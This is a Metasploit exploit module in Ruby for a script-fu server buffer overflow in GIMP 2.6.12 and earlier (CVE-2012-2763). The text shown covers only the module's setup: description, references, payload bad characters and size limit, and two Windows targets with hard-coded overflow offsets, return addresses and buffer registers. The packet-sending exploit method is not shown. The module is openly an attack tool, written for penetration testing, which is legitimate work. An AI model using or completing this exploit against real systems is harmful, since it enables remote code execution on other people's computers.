##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
# Registers the module's metadata (name, description, references, payload
# constraints, targets) with the framework and exposes the RPORT option,
# defaulting to 10008, the port the script-fu server listens on.
#
# @param info [Hash] metadata supplied by the framework; merged through
#   +update_info+ so framework-provided keys are kept.
def initialize(info = {})
  description = %q{
    This module exploits a buffer overflow in the script-fu server
    component on GIMP <= 2.6.12. By sending a specially crafted packet, an
    attacker may be able to achieve remote code execution under the context
    of the user.
    This module has been tested on GIMP for Windows from installers
    provided by Jernej Simoncic.
  }

  authors = [
    'Joseph Sheridan', # Vulnerability Discovery and PoC
    'juan vazquez'     # Metasploit module
  ]

  references = [
    [ 'CVE', '2012-2763' ],
    [ 'OSVDB', '82429' ],
    [ 'BID', '53741' ],
    [ 'EDB', '18956' ],
    [ 'URL', 'http://www.reactionpenetrationtesting.co.uk/advisories/scriptfu-buffer-overflow-GIMP-2.6.html' ]
  ]

  # Bytes the payload may not contain: NUL, tab/LF/CR/space, '(' ')' ';'
  # and every byte from 0x80 to 0xff. Presumably the server parses the
  # packet body as text and these bytes would break it — confirm against
  # the advisory linked above. Space is capped at 1024 bytes and NOP
  # sleds are disabled.
  payload_constraints = {
    'Space'       => 1024,
    'BadChars'    => "\x00\x09\x0a\x0d\x20\x28\x29\x3b" + (0x80..0xff).to_a.pack("C*"),
    'DisableNops' => true,
  }

  # Each target pins a fixed Offset and Ret plus the register that holds the
  # buffer address when control is gained. Ret is a hard-coded address, so a
  # target presumably only works when the GIMP image loads at its expected
  # base; the target names also record that DEP must be disabled.
  targets = [
    [ 'GIMP 2.6.10 (no DEP) / Windows XP SP3 / Windows 7 SP1',
      {
        'Offset'         => 1102,
        'Ret'            => 0x00425a52,
        'BufferRegister' => 'EDX'
      }
    ],
    [ 'GIMP 2.6.1 (no DEP) / Windows XP SP3 / Windows 7 SP1',
      {
        'Offset'         => 1086,
        'Ret'            => 0x00425a22,
        'BufferRegister' => 'EAX'
      }
    ]
  ]

  super(update_info(info,
    'Name'           => 'GIMP script-fu Server Buffer Overflow',
    'Description'    => description,
    'Author'         => authors,
    'Version'        => '$Revision: $',
    'References'     => references,
    'DefaultOptions' =>
      {
        'EXITFUNC' => 'process',
      },
    'Payload'        => payload_constraints,
    'Platform'       => 'win',
    'Targets'        => targets,
    'Privileged'     => true,
    'DefaultTarget'  => 0,
    'DisclosureDate' => 'May 18 2012'))

  # Only the remote port is module-specific; RHOST comes from the Tcp mixin.
  register_options([Opt::RPORT(10008)], self.class)
end